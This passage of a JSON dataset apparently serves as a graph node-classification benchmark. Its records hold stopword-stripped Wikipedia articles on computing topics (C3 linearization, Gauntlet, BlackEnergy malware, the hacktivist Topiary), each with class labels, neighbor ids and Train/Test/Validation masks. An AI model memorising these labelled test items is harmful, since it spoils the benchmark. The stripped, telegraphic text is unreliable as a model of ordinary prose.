easy-to-grasp example clock speed factor relevant computer performance",
    "neighbors": [
      3586,
      7173,
      9739,
      5645,
      5649,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      10837,
      2655,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      2719,
      6815,
      5793,
      6818,
      8352,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      2764,
      9932,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      5883,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      7963,
      2339,
      6950,
      3886,
      7983,
      309,
      8501,
      11062,
      5948,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      9092,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      7657,
      9707,
      1005,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 5330,
    "label": 9,
    "text": "C3_linearization:c3 linearization computing c3 superclass linearization algorithm used primarily obtain order methods inherited presence multiple inheritance words output c3 superclass linearization deterministic method resolution order mro c3 superclass linearization results three important properties first published 1996 oopsla conference paper entitled monotonic superclass linearization dylan adapted open dylan implementation january 2012 following enhancement proposal chosen default algorithm method resolution python 2.3 newer perl 6 parrot solidity pgf/tikz object-oriented programming module also available alternative non-default mro core perl 5 starting version 5.10.0 extension implementation earlier versions perl 5 named codice_1 exists cpan python guido van rossum summarizes c3 superclass linearization thusly c3 superclass linearization class sum class plus unique merge linearizations parents list parents list parents last argument merge process preserves local precedence order direct parent classes merge parents linearizations parents list done selecting first head lists appear tail elements list except first lists note good head may appear first element multiple lists time forbidden appear anywhere else selected element removed lists appears head appended output list process selecting removing good head extend output list repeated remaining lists exhausted point good head selected heads remaining lists appear one tail lists merge impossible compute due inconsistent orderings dependencies inheritance hierarchy linearization original class exists naive divide conquer approach computing linearization class may invoke algorithm recursively find linearizations parent classes merge-subroutine however result infinitely looping recursion presence cyclic class hierarchy detect cycle break infinite recursion reuse results previous computations optimization recursive invocation shielded re-entrance previous argument means cache memoization given linearization z computed first metaclass enable short representation objects name instead example class '__main__.a class type type class object metaclass=type pass construct inheritance tree class pass class b pass class c pass class pass class e pass class k1 b c pass class k2 b e pass class k3 pass class z k1 k2 k3 pass » z.mro z k1 k2 k3 b c e type 'object perl 6 uses c3 linearization classes default say z.^mro output z k1 k2 k3 b c e mu",
    "neighbors": [
      11620,
      8582,
      2281,
      8554,
      3051,
      7894,
      11610,
      764
    ],
    "mask": "Test"
  },
  {
    "node_id": 5331,
    "label": 4,
    "text": "Visitor_management:visitor management visitor management refers tracking usage public building site gathering increasing amounts information visitor management system record usage facilities specific visitors provide documentation visitor ’ whereabouts. ref",
    "neighbors": [
      2737,
      1083,
      6885,
      5331
    ],
    "mask": "None"
  },
  {
    "node_id": 5332,
    "label": 7,
    "text": "Hortonworks:hortonworks hortonworks data software company based santa clara california developed supported open-source software primarily around apache hadoop designed manage big data associated processing hortonworks completed merger cloudera january 2019 hortonworks software used build enterprise data services applications iot connected cars example single view x customer risk patient advanced analytics machine learning next best action realtime cybersecurity hortonworks three interoperable product lines hortonworks formed june 2011 independent company funded 23 million venture capital yahoo benchmark capital first office sunnyvale california company employs contributors open source software project apache hadoop hortonworks data platform hdp product includes apache hadoop used storing processing analyzing large volumes data platform designed deal data many sources formats platform includes hadoop technology hadoop distributed file system mapreduce pig hive hbase zookeeper additional components eric baldeschweiler yahoo initial chief executive rob bearden chief operating officer formerly springsource benchmark partner peter fenton board member company name refers character horton elephant since elephant symbol hadoop october 2018 hortonworks cloudera announced would merging all-stock merger equals",
    "neighbors": [
      9344,
      10661,
      1222,
      7750,
      9179,
      11016,
      8810,
      10719,
      6156,
      1935,
      11343,
      982,
      8408,
      8217,
      3323,
      253,
      8735
    ],
    "mask": "None"
  },
  {
    "node_id": 5333,
    "label": 3,
    "text": "Bokosuka_Wars:bokosuka wars game responsible laying foundations tactical role-playing game genre simulation rpg genre known japan blend role-playing strategy game elements game also variously described early example action role-playing game early prototype real-time strategy game unique reverse tower defense game time game considered major success japan originally developed 1983 sharp x1 computer ascii entertainment first software contest sold boxed year msx port released 1984 followed 1985 versions s1 pc-6000mkii pc-8801 pc-9801 fm-7 family computer latter released december 14 1985 login magazine november 1984 issue featured sequel x1 entitled new bokosuka wars source code included all-new enemy characters redesigned items traps level difficulty became balanced also included tape login magazine november 1984 issue never sold form pc-8801 version used sold download enterbrain ported i-mode service 2004 famicom version released wii virtual console april 8 2008 sequel bokosuka wars ii released japan november 10 2016 later famicom version king suren forces captured turned trees rocks king ogereth king suren release warriors trees rocks defeat king ogereth forces allies coming trees rocks appear famicom version earlier x1 msx pc computer versions however player starts complete army may gain extra knights freeing prison cells trees rocks soldiers turned objects original computer versions player control three chess-like units king knight pawn pressing d-pad move king suren army desired direction captive soldiers freed using knight break gates front famicom version player starts game king suren 597m acquires allies bumping trees cacti rocks walls using king suren restore normal form throughout world bokosuka obstacles certain characters pass gates soldiers locked broken knights death tiles kill characters except soldiers remove step walls 500m 400m 300m 200m broken king suren one unit collides another battle takes place tile change icon crossed swords b battle victory automatically calculated computer based difference offensive strengths units king suren dies game ends announcing wow lose king suren succeeds defeating king ogreth game ends bravo win japanese instruction manual contains lyrics onward bokosuka すすめボコスカ peculiar game music written programmer",
    "neighbors": [
      5762,
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 5334,
    "label": 4,
    "text": "MIMEDefang:mimedefang mimedefang gpl licensed framework filtering e-mail uses sendmail milter api c glue code perl code let user write high-performance mail filters perl mimedefang used mimedefang originally developed dianne skoll contracted royal college physicians surgeons canada 2000 help stop flood email viruses college network software written filter attachments originally called mimesweeper mimedefanger currently mimedefang skoll announced software public august 28 2000 december 21 2001 version incorporating support spamassassin released making mimedefang filter spam viruses skoll company roaring penguin software currently markets commercial anti-spam product known canit based open-source version mimedefang milter library included sendmail uses posix threads allow multiple concurrent filters mimedefang perl filter uses pre-forked process model similar traditional apache web server multi-processing model mimedefang therefore consists three components mimedefang users code filtering policies perl using infrastructure provided mimedefang.pl n't need worry thread synchronizations perl filter separate single-threaded process infrastructure provided mimedefang.pl follows milter api reasonably closely exactly includes convenience routines parsing rebuilding mime messages filter authors concentrate high-level policy rather worry low-level api details convenience comes small loss flexibility loss performance",
    "neighbors": [
      865,
      2945,
      4294,
      8582,
      9053,
      1967,
      2737,
      7739,
      731,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5335,
    "label": 2,
    "text": "Comparison_of_OpenSolaris_distributions:comparison opensolaris distributions technical variations solaris distributions include support different hardware devices systems software package configurations organizational differences may motivated historical reasons criteria include security including quickly security upgrades available ease package management number packages available tables compare noteworthy distribution latest stable release wide-ranging objective criteria cover operating system subjective merits branches marked unstable beta compare solaris distributions operating systems basic general information distributions creator producer release date latest version forth information features distributions package numbers approximate",
    "neighbors": [
      3969,
      8077,
      2967,
      8092,
      6049,
      546,
      6445,
      2864,
      11184,
      9671,
      5067,
      1101,
      8909,
      463,
      8147,
      10971,
      10851,
      11363,
      5096,
      9320,
      5356,
      366,
      5358,
      11506,
      499,
      5492,
      1399,
      5240,
      4858,
      381,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 5336,
    "label": 9,
    "text": "Plus_(programming_language):plus programming language plus pascal-like system implementation language university british columbia ubc canada based sue system language developed university toronto c. 1971 another programming language named plus developed sperry univac roseville minnesota univac plus subject article plus developed university british columbia ubc computing centre alan ballard paul whaley use development michigan terminal system mts code generated compiler operating system dependent limited use development mts ubc plus compiler written largely plus runs michigan terminal system mts ibm s/370 compatible hardware ibm os/vs1 generates code ibm s/370 dec pdp-11 motorola 68000 architectures plus based large extent sue system language developed university toronto c. 1971 sue language derived particularly data structure facilities pascal plus superficially quite different sue pascal however underlying language semantics really quite similar users familiar c programming language also recognize much structure semantics plus goals compiler plus language include manual ubc plus plus programming language available description source object libraries available use plus plus source library definitions also available hello world example program prints string hello world terminal screen display",
    "neighbors": [
      9345,
      4069,
      6342,
      7269,
      6248,
      11625,
      8524,
      7983,
      11219,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5337,
    "label": 4,
    "text": "BlackEnergy:blackenergy blackenergy malware first reported 2007 http-based toolkit generated bots execute distributed denial service attacks 2010 blackenergy 2 emerged capabilities beyond ddos 2014 blackenergy 3 came equipped variety plug-ins russian-based cybergang known sandworm attributed using blackenergy targeted attacks attack distributed via word document powerpoint attachment email luring victims clicking seemingly legitimate file blackenergy code facilitates different attack types infect target machines also equipped server-side scripts perpetrators develop command control c c server cybercriminals use blackenergy bot builder toolkit generate customized bot client executable files distributed targets via email spam phishing e-mail campaigns be1 lacks exploit functionalities relies external tools load bot blackenergy detected using yara signatures provided united states department homeland security dhs • target one ip address per hostname • runtime encrypter evade detection antivirus software • hides processes system driver syssrv.sys • ddos attack commands e.g icmp flood tcp syn flood udp flood http get flood dns flood etc • download commands retrieve launch new updated executables server • control commands e.g stop wait die blackenergy 2 uses sophisticated rootkit/process-injection techniques robust encryption modular architecture known dropper decrypts decompresses rootkit driver binary installs victim machine server randomly generated name update blackenergy 1 combines older rootkit source code new functions unpacking injecting modules user processes packed content compressed using lz77 algorithm encrypted using modified version rc4 cipher hard-coded 128-bit key decrypts embedded content decrypting network traffic cipher uses bot unique identification string key second variation encryption/compression scheme adds initialization vector modified rc4 cipher additional protection dropper rootkit unpacking stub used inner rootkit userspace modules primary modification rc4 implementation blackenergy 2 lies key-scheduling algorithm • execute local files • download execute remote files • updates plugins command control servers • execute die destroy commands latest full version blackenergy emerged 2014 changes simplified malware code version installer drops main dynamically linked library dll component directly local application data folder variant malware involved december 2015 ukraine power grid cyberattack • fs.dll — file system operations • si.dll — system information “ blackenergy lite ” • jn.dll — parasitic infector • ki.dll — keystroke logging • ps.dll — password stealer • ss.dll — screenshots • vs.dll — network discovery remote execution • tv.dll — team viewer • rd.dll — simple pseudo “ remote desktop ” • up.dll — update malware • dc.dll — list windows accounts • bs.dll — query system hardware bios windows info • dstr.dll — destroy system • scan.dll — network scan",
    "neighbors": [
      5665,
      9762,
      11662,
      3506,
      8978,
      9688,
      9791
    ],
    "mask": "Test"
  },
  {
    "node_id": 5338,
    "label": 4,
    "text": "PacketTrap:packettrap packettrap provider network management traffic analysis software midsize companies company headquartered san francisco california corporate parent dell located round rock texas packettrap features include desktop management server management monitor cloud assets etc",
    "neighbors": [
      1400
    ],
    "mask": "None"
  },
  {
    "node_id": 5339,
    "label": 3,
    "text": "Buffalo_network-attached_storage_series:buffalo network-attached storage series buffalo network-attached storage series network-attached storage devices modified miniature general purpose linux-based computers linkstation terastation intended general public kuro box intended expert hackers cheap platform linux development devices undergone various improvements since first produced example first generation device 100base-tx network adapter using parallel ata hard drive current version 1000base-t-capable connection uses serial ata interface older generations device used powerpc mips processors latest version device uses arm architecture processor linkstation powerpc mips arm based network attached storage appliance sold north america europe japan significantly notable among linux community japan us/europe hackable generic linux appliance made tasks file storage task designed linkstation ethernet usb serial ports video output made buffalo technology division melco produced japan 2006 also available american retailers best buy compusa well europe kuro box name series powerpc arm processor based computers intended use network-attached storage device original kuro box made spare hardware components manufacturer linkstation recent versions kuro box use later linkstation hardware hardware similar linkstation kuro box versions provided without hard drive case physical dimensions shape corresponding linkstation black color japanese symbols kuro box 玄箱 meaning box operated expert esoteric knowledge silver lettering side panel name also pun kuro different kanji 黒 also means 'black since january 2012 terastation uses lio iscsi target device runs linux included changes linux source code buffalo required release modified versions source code per terms gnu general public license due availability source code relatively low cost device several community projects centered around two main replacement firmware releases available device first openlink based official buffalo firmware improvements features added freelink debian distribution product designed manufacturer accept user-supplied linux distribution several including kurobox-specific distribution called sylver debian gentoo linux fedora core ported various user groups us/europe japan like linkstation device runs version linux debian gentoo linux distributions netbsd reported ported device various iterations ships universal plug play protocol distribution multimedia stored device also configured variety different media servers twonkyvision media server slimserver/squeezecenter server itunes server using digital audio access protocol samba server lio iscsi target mldonkey client well network file system server posix-based systems use backup server modified use rsync back synchronize data one many computers network pushing data even linkstation pulling data remote servers—beside use buffalo-provided backup software windows also found use number ways notably usb interface comes configured print server also use common unix printing system act usb printer users managed get use number usb devices version 2.6 linux kernel enhanced usb support additionally apache http server software already installed purpose providing buffalo configuration screens device easily converted lightweight web server buffalo content deleted serve content operator choice",
    "neighbors": [
      1537,
      3585,
      2308,
      6797,
      1682,
      405,
      10393,
      5019,
      2594,
      2723,
      6178,
      7983,
      9266,
      823,
      1849,
      1728,
      7234,
      8899,
      7492,
      10820,
      11337,
      9163,
      6618,
      2784,
      865,
      3300,
      5482,
      9964,
      2285,
      3053,
      9581,
      1776,
      10606,
      2420,
      8700,
      10109
    ],
    "mask": "Train"
  },
  {
    "node_id": 5340,
    "label": 3,
    "text": "Gauntlet_(1985_video_game):gauntlet 1985 video game gauntlet fantasy-themed hack slash 1985 arcade game atari games noted one first multi-player dungeon crawl arcade games core design gauntlet comes dandy 1983 atari 8-bit family title resulted lawsuit arcade version gauntlet released november 1985 initially available dedicated 4-player cabinet total 7,848 units distributed atari later released 2-player cabinet variant june 1986 aimed operators could afford sufficient space 4-player version game set within series top-down third-person perspective mazes object find touch designated exit every level assortment special items located level increase player character health unlock doors gain points magical potions destroy enemies screen player controls one four playable fantasy-based characters thor warrior merlin wizard thyra valkyrie questor elf characters named cabinet artwork in-game 're referred title classes character unique strength weaknesses example warrior strongest hand-to-hand combat wizard powerful magic valkyrie best armor elf fastest movement characters assigned control panel 4-player version whereas 2-player version player selects character start game joining middle play enemies assortment fantasy-based monsters including ghosts grunts demons lobbers sorcerers thieves enters level specific generators destroyed bosses game dangerous enemy death destroyed using magic potion otherwise death vanish automatically drained certain amount health player game progresses higher levels skill needed reach exit success often depending willingness players cooperate sharing food luring monsters places engaged slaughtered conveniently contact enemies reduces player health health also slowly drains thus creating time limit character health reaches zero character dies character revived place full health spending game credit — inserting coin arcade — within certain short time window died allows even least proficient players keep playing indefinitely willing keep inserting coins however player final score divided amount credits used play resulting average aside ability four players game also noted narrator voice produced texas instruments tms5220c speech chip tms5220c speech encoded earl vickers narrator voiced ernie fosselius frequently makes statements repeating game rules including shots hurt players yet remember n't shoot food elf shot food warrior needs food badly narrator occasionally comments battle saying 've seen bravery let see get player life force points fall 200 narrator states life force running elf needs food valkyrie die control panel 4-player cabinet wider standard uprights order accommodate four people time player 8-way joystick two buttons one fire ranged attack one magic magic button also starts game gauntlet release games started using design popular conversion target newer games run originally called dungeons game conceived atari game designer ed logg claimed inspiration son interest paper-based game dungeons dragons interest 1983 atari 800 home computer game dandy game development spanned 1983 1985 team led designers ed logg roger zeigler working title became legally unavailable april 1985 renamed gauntlet may based upon elaborate hardware design atari history date company first coin-operated game features voice synthesizer chip gauntlet ported ms-dos apple ii apple macintosh msx nes apple iigs master system genesis gauntlet 4 atari st commodore 64 amstrad cpc zx spectrum genesis port released gauntlet 4 spelled gauntlet iv packaging manual outside japan adds three modes addition arcade mode quest action rpg battle deathmatch game record single-player variant arcade mode progress kept track via passcode emulated instance original gauntlet arcade series included midway arcade treasures 2003 compilation arcade games available nintendo gamecube playstation 2 xbox windows gauntlet deeper dungeons expansion pack original ports gauntlet 512 new levels required original program released 1987 british company u.s. gold uk europe mindscape united states released amstrad cpc msx atari st commodore 64 zx spectrum developed gremlin graphics many levels entries competition throughout europe ten winners awarded prizes gauntlet t-shirt copy program computers contest announced instructions many ported games early 1987 u.s. gold release expansion cassette gauntlet containing hundreds new levels treasure rooms chance maze included tape levels presented randomly artwork side panel artwork arcade cabinet main characters shown enemies removed image replaced pink background many reviewers noted levels much harder original game although consensus quite good first game newly released arcade sequel game highly profitable upon october 1985 launch reportedly earning one san mateo california arcade operator sixteen weeks another canadian operator nine days atari ultimately sold total 7,848 gauntlet video game arcade cabinets 1986 golden joystick awards london gauntlet game year runner-up category arcade-style game year entertainment weekly picked game 14 greatest game available 1991 saying sequels game nothing matches original gauntlet innovative fast-playing mix mazes monsters magic spells macintosh version game reviewed 1989 dragon 150 hartley patricia kirk lesser role computers column reviewers gave game 4 5 stars compute praised macintosh version sound effects computer video games praised accuracy amstrad version said great graphics good sounds perfect playability crash praised smooth fast scrolling longevity avenger listed alternative master system review ace said people ages could quickly master controls tasks spectrum version biggest selling game 1986 voted number 38 sinclair readers top 100 games time mega drive release 1993 megatech said action flawless stood test time well continued brilliant game one warrants immediate attention mega praised longevity game saying huge fun must-buy placing game 19 list best mega drive games time decade release official uk playstation magazine noted spent many night hunched fag-stained gauntlet machine said limitations become apparent late 1990s next generation including game top 100 games time noted intro record gauntlet number 101 controversy arose release game arcade subsequent port nintendo entertainment system ed logg co-creator asteroids centipede credited original game design gauntlet arcade version well 1987 nes release version release john palevich threatened lawsuit asserting original concept game dandy game atari 8-bit family written palevich published 1983 conflict settled without suit filed atari games business tengen allegedly awarding palevich gauntlet game machine credited special thanks 1986 logg entirely removed credits later releases 2007 logg claims involvement nes game dandy later reworked atari corporation published atari 2600 atari 7800 atari 8-bit family dark chambers 1988 world record holder gauntlet russ cool score 5.1 million points set december 6 2013",
    "neighbors": [
      8484,
      8300,
      6797,
      9006,
      2159,
      1776,
      7281,
      9166,
      10316,
      10931,
      2073,
      5820,
      606,
      4991
    ],
    "mask": "Test"
  },
  {
    "node_id": 5341,
    "label": 4,
    "text": "MySecureCyberspace:mysecurecyberspace mysecurecyberspace began 2003 initiative carnegie mellon cylab information networking institute educate public computer security network security internet safety inspired national strategy secure cyberspace initiative empowers users secure part cyberspace initiative created web portal www.mysecurecyberspace.com customized information users cybersecurity threats addition tactical countermeasures legal ethical privacy issues example using secure cyberspace tool web portal user could enter online activity email receive explanation common threats issues associated activity spam phishing scams receive advice resolve problems web portal mysecurecyberspace served people ages roles certain areas web portal contained articles resources specifically parents educators children 2005 2012 mysecurecyberspace provided flash-based interactive game designed elementary school children www.carnegiecyberacademy.com called carnegie cadets reinforced principles safe responsible computing enriched content classroom material complied national educational technology standards game could integrated fourth fifth grade curricula carnegie cyber academy website supporting materials remain available game compatible current operating systems grant national science foundation cylab information networking institute launched web portal april 2005 included prototype online carnegie cadets game carnegie cadets mysecurecyberspace game companion website officially launched october 26 2007 demonstration j.h brooks elementary school pittsburgh pa attorney general tom corbett attended kickoff event endorsed game",
    "neighbors": [
      2464,
      939,
      10928,
      9426,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5342,
    "label": 9,
    "text": "Lispkit_Lisp:lispkit lisp lispkit lisp lexically scoped purely functional subset lisp pure lisp developed testbed functional programming concepts first used early experimentation lazy evaluation secd machine-based implementation written algol variant published developer peter henderson 1980 compiler virtual machine highly portable result implemented many machines base language provides following functions extensions discussed henderson book explicit support lazy evaluation non-deterministic programming functions lambda let letrec similar subtle differences way treat named variables make useful different ways lambda defines returns function let binds expressions variable names letrec essentially similar let except allows definition recursive functions values e.g. infinite series",
    "neighbors": [
      512,
      10403,
      6536,
      1952
    ],
    "mask": "Test"
  },
  {
    "node_id": 5343,
    "label": 2,
    "text": "Emmabuntüs:emmabuntüs emmabuntüs linux distribution derived ubuntu/debian designed facilitate repacking computers donated humanitarian organizations like emmaüs communities name emmabuntüs portmanteau emmaüs ubuntu desktop environment xfce cairo-dock lxde also included optionally installed multiple applications installed perform task order provide choice user uses system examples",
    "neighbors": [
      7431,
      3859,
      5397,
      11669,
      11418,
      926,
      10016,
      3245,
      6445,
      8621,
      8112,
      9780,
      439,
      7483,
      2108,
      1089,
      3649,
      708,
      3654,
      7626,
      5067,
      975,
      2383,
      1107,
      4309,
      5078,
      4951,
      3550,
      1632,
      4192,
      6371,
      5990,
      7913,
      7020,
      8177,
      2930,
      499,
      1396,
      5363,
      9971,
      5369,
      5755,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 5344,
    "label": 7,
    "text": "Proactive_network_provider_participation_for_P2P:proactive network provider participation p2p p4p proactive network provider participation p2p method internet service providers isps peer-to-peer p2p software optimize peer-to-peer connections p4p proponents say save isp significant costs using local connections also speeds download times p2p downloaders 45 critics say favor downloaders isps come expense others established 2007 p4p working group p4pwg participants isp movie/content p2p industries focused helping isps handle demands large media files enabling legal distribution – building believe effective model transmitting movies large files customers current p2p model shares data equally peers regardless whether nearby results several nearby peers sending receiving data across world possible – working group members say currently pattern traffic poses problem p4p works isp use new itracker provides information isp network configured p2p client software p2p torrent servers called trackers query itracker identify data routes isp prefers connections avoid changing depending time day p2p software co-operatively connect peers closer cheaper isp selectively favoring peers instead choosing peers randomly provides three methods finding local peers note p4p replace control p2p networks p4p allows isps provides additional information regarding network topology p2p networks may choose utilize optimize network data delivery information used combination information p2p networks collect observed peer data transfer rates example p2p network selecting nearby peer slow far peer fast decision entirely control p2p network implementation p4p entirely voluntary part isps p2p networks adopted mutually beneficial concern existing p2p trackers p4p may used prevent piracy future p4p working group includes prominent members entertainment industry well known anti-piracy lobbyists anti-piracy measures could added future p2p industry also says p4p may slow transfers users bittorrent example designed favor fastest peers available – changed favor closest peers instead must affect speed equality balance peers would lost – clients networks good backbone slow upload speeds would download slower clients using isps support p4p would benefit using local peers p4p work software supports yet protocols currently dominate network keep blind locality liteload shay horovitz danny dolev hebrew university jerusalem presents solution leads p2p locality isps existing protocols future ones",
    "neighbors": [
      8640,
      11029
    ],
    "mask": "Train"
  },
  {
    "node_id": 5345,
    "label": 4,
    "text": "Douglas_Thomas:douglas thomas douglas thomas born 1966 american scholar researcher journalist associate professor annenberg school communication university southern california studies technology communication culture author editor numerous books including reading nietzsche rhetorically guilford 1998 cybercrime security surveillance information age brian loader routledge 2000 hacker culture university minnesota press 2002 technological visions hopes fears shape new technologies marita sturken sandra ball-rokeach published numerous articles academic journals founding editor games culture journal interactive media 1998 1999 covered case kevin mitnick wired news july 24 2002 testified congress topic cyber terrorism critical infrastructure protection research funded annenberg center communication richard lounsbery foundation macarthur foundation focused relationship virtual worlds civic engagement digital media learning recent article co-authored john seely brown gamer disposition named harvard business review breakthrough idea 2008 also featured conversation starter blog also co-authored new culture learning cultivating imagination world constant change translated turkish",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 5346,
    "label": 9,
    "text": "BennuGD:bennugd bennugd also referred bennu game development bennu high-level open-source video game development suite originally created fenix project fork argentinian hacker splitergu officially supported windows linux gp2x wiz gp2x caanoo dingux also run multiple platforms extent including freebsd mac os x ios consoles gp2x dingoo a320 wii recently bennugd ported sega dreamcast playstation 2 bennugd focuses modularity portability makes easy beginners experienced users create games bennugd console application several integrated development environments ide available none officially supported package includes compiler run-time code different shared libraries extend core functionality bennugd created fenix project fork argentinian hacker splintergu disagreements fenix project community january 2010 first part two-part series articles bennugd published spanish todolinux magazine february 2010 second part published",
    "neighbors": [
      1952,
      10316,
      7983,
      9045,
      823,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5347,
    "label": 9,
    "text": "SAMPL:sampl sampl stands stochastic ampl algebraic modeling language resulting expanding well-known language ampl extended syntax keywords designed specifically representing stochastic programming problems recent extensions problems chance constraints integrated chance constraints robust optimization problems generate deterministic equivalent version instances using solvers ampl connects generate smps representation use specialized decomposition based solvers like fortsp sampl shares language features ampl adds constructs specifically designed expressing scenario based stochastic programming robust optimization express scenario-based sp problems additional constructs describe tree structure group decision variable stages moreover possible specify parameter stores probabilities branch tree set represents scenario set constructs easily define chance constraints integrated chance constraint sp problem available well using language constructs allows retain structure problem hence making available solvers might exploit using specialized decomposition methods like benders decomposition speed-up solution sampl supports constructs describe three types robust optimization formulations sampl currently available part software ampldev distributed www.optirisk-systems.com supports many popular 32- 64-bit platforms including windows linux mac os x free evaluation version limited functionality available following sampl version simple problem dakota show sp related constructs include data file follows normal ampl syntax see example provided ampl wikipedia page reference sampl instance level format sp problems smps therefore problem solved solver supports standard one solvers fortsp included standard sampl distribution regarding robust optimization problems needed solver depend specific formulation used ben-tal nemirovski formulation need second-order cone capable solver",
    "neighbors": [
      9345,
      5612,
      1039,
      7983,
      823,
      9915
    ],
    "mask": "None"
  },
  {
    "node_id": 5348,
    "label": 3,
    "text": "Programmable_interval_timer:programmable interval timer computing embedded systems programmable interval timer pit counter generates output signal reaches programmed count output signal may trigger interrupt pits may one-shot periodic one-shot timers signal stop counting periodic timers signal every time reach specific value restart thus producing signal periodic intervals periodic timers typically used invoke activities must performed regular intervals counters usually programmed fixed intervals determine long counter count signals interval determines long counter count output signal intel 8253 pit original timing device used ibm pc compatibles used 1.193182 mhz clock signal one third color burst frequency used ntsc one twelfth system clock crystal oscillator contains three timers timer 0 used microsoft windows uniprocessor linux system timer timer 1 historically used dynamic random access memory refreshes timer 2 pc speaker lapic newer intel systems offers higher-resolution one microsecond timer used preference pit timer linux kernels starting 2.6.18",
    "neighbors": [
      4773,
      9861,
      2503,
      3272,
      3943,
      6797,
      4046,
      8879,
      1425,
      5457,
      3027,
      6129,
      7538,
      9557,
      823,
      2523
    ],
    "mask": "Test"
  },
  {
    "node_id": 5349,
    "label": 4,
    "text": "Topiary_(hacktivist):topiary hacktivist topiary real name jake leslie davis born 27 october 1992 former hacker worked anonymous lulzsec similar hacktivist groups associate internet group anonymous publicly claimed various online attacks including hacking hbgary westboro baptist church gawker also claimed responsibility defacing government websites countries zimbabwe syria tunisia ireland egypt 24 february 2011 topiary gained attention appeared david pakman show informed host anonymous replaced westboro baptist church webpage message anonymous on-air confrontation shirley phelps-roper recording event placed youtube reached one million views five days topiary member lulzsec ran twitter account guardian reported topiary name daniel 14 july 2011 guardian published exclusive interview topiary spoke extensively motivations describing internet denizen passion change said feared tracked authorities hope n't pinned us especially friends lulzsec later full transcript lengthy interview surfaced website freelance guardian journalist ryan gallagher 18-year-old man suspected topiary arrested shetland islands scotland 27 july 2011 31 july 2011 man charged five offences including unauthorised computer access conspiracy carry distributed denial service attack serious organised crime agency website scotland yard later identified man arrested jake davis resident island yell charged unauthorised access computer computer misuse act 1990 encouraging assisting criminal activity serious crime act 2007 conspiracy launch denial-of-service attack serious organised crime unit contrary criminal law act 1977 criminal conspiracy also criminal law act 1977 police confiscated dell laptop 100-gigabyte hard drive 16 different virtual machines hard drive also contained details relating attack sony hundreds thousands email addresses passwords london court released davis bail conditions live curfew mother access internet lawyer gideon cammerman stated client help publicise lulzsec anonymous attacks lacked technical skills anything sympathiser arrest anonymous launched 'free topiary campaign included adding free topiary banner twitter avatars similar free bradley banner davis pleaded guilty 25 june 2012 ddos attacks several websites pleaded guilty two counts encouraging others commit computer offenses fraud davis due tried along ryan cleary ryan ryan ackroyd kayla mustafa al-bassam tflow beginning 8 april 2013 court informed would take 3,000 hours view material ackroyd alone released bail except cleary 8 april 2013 davis appeared court fellow hackers ryan ackroyd ryan cleary mustafa al-bassam four pleaded guilty computer crimes sentenced 14 may 2013 davis faced maximum 10 years prison got 24 months young offenders institute served 38 days electronically tagged 21 months counted sentence",
    "neighbors": [
      1024,
      8320,
      3843,
      5636,
      5764,
      10502,
      2187,
      4240,
      11152,
      10003,
      10132,
      4117,
      8726,
      535,
      1688,
      2717,
      9375,
      1440,
      5024,
      9761,
      4644,
      4133,
      5028,
      11175,
      297,
      2857,
      5547,
      8489,
      11052,
      9518,
      9904,
      7601,
      1970,
      9395,
      8886,
      1337,
      441,
      1979,
      4027,
      10875,
      9664,
      8133,
      1608,
      3657,
      8779,
      3789,
      4304,
      6484,
      4054,
      7639,
      8664,
      857,
      1882,
      4314,
      4956,
      7515,
      4830,
      3807,
      1504,
      4703,
      8288,
      9186,
      8292,
      1254,
      10477,
      2542,
      3711,
      9435,
      3956,
      9460,
      1400,
      7418,
      507,
      9082,
      2815
    ],
    "mask": "None"
  },
  {
    "node_id": 5350,
    "label": 0,
    "text": "Computational_humor:computational humor computational humor branch computational linguistics artificial intelligence uses computers humor research relatively new area first dedicated conference organized 1996 first computer model sense humor suggested suslov early 1992 investigation general scheme information processing shows possibility specific malfunction conditioned necessity quick deletion consciousness false version specific malfunction identified humorous effect psychological grounds exactly corresponds incongruity-resolution theory however essentially new ingredient role timing added well-known role ambiguity biological systems sense humor inevitably develops course evolution biological function consists quickening transmission processed information consciousness effective use brain resources realization algorithm neural networks justifies naturally spencer hypothesis mechanism laughter deletion false version corresponds zeroing part neural network excessive energy neurons thrown motor cortex arousing muscular contractions practical realization algorithm needs extensive databases whose creation automatic regime suggested recently result magistral direction developed properly subsequent investigations accepted somewhat specialized colouring approach analysis humor classification jokes step attempt generate jokes basing rules underlie classification simple prototypes computer pun generation reported early 1990s based natural language generator program vinci graeme ritchie kim binsted 1994 research paper described computer program jape designed generate question-answer-type puns general i.e. non-humorous lexicon program name acronym joke analysis production engine examples produced jape since approach improved latest report dated 2007 describes standup joke generator implemented java programming language standup generator tested children within framework analyzing usability language skills development children communication disabilities e.g. cerebral palsy project name acronym system augment non-speakers dialog using puns allusion standup comedy children responded language playground enthusiasm showed marked improvement certain types language tests two young people used system ten-week period regaled peers staff family neighbors jokes call spicy missile hot shot joy enthusiasm entertaining others inspirational stock strapparava described program generate funny acronyms askthebrain 2002 used clustering bayesian analysis associate concepts comical way statistical machine learning algorithm detect whether sentence contained said double entendre developed kiddon brun 2011 open-source python implementation kiddon brun twss system program recognize knock-knock jokes reported taylor mazlack kind research important analysis human-computer interaction application machine learning techniques distinguishing joke texts non-jokes described mihalcea strapparava 2006 takizawa et al 